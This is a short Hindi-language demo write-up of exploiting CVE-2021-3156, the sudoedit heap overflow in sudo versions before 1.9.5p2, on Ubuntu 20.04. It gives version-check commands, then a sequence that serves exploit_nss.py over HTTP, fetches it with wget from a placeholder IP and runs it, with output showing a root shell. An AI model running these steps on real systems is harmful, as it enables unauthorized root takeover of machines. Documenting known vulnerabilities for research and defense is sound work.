
CVE-2021-3156-शोषण-डेमो
📅 दिनांक: 2025-06-08
✍️ लेखक: @TopskiyPavelQwertyGang
🧠 Security Researcher | Red Team Enthusiast
sudoedit (sudo)Heap-overflow sudoedit में स्थानीय उपयोगकर्ता को पूर्व-तैयार मापदंडों के साथ sudoedit कमांड निष्पादित करने पर रूट एक्सेस प्राप्त करने की अनुमति देता है।
शोषण sudo < 1.9.5p2 संस्करणों के लिए सक्रिय है, जिसमें लोकप्रिय Ubuntu/Debian/CentOS छवियाँ शामिल हैं।
ASLR चालू होने पर भी कमजोरी शोषण योग्य बनी रहती है।
OS : Ubuntu 20.04.3 LTS
glibc : 2.31 (tcache ON)
sudo : 1.8.31 (कमजोर)
ASLR : 2 (चालू)
glibc और sudo के संस्करणों की जाँच की गई:ldd --version
sudo --version
python3 -m http.server 80
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py
$ python3 exploit_nss.py
# whoami
root
CVE-2021-3156 का शोषण सक्रिय ASLR के साथ भी संभव बना रहता है, यदि glibc ≥ 2.26 और sudo कमजोर संस्करण का है।
सबसे स्थिर शोषण exploit_nss.py निकला, जो सही NSS कॉन्फ़िगरेशन के साथ पहली बार में काम करता है।
🧨 सिस्टम नियंत्रण में है।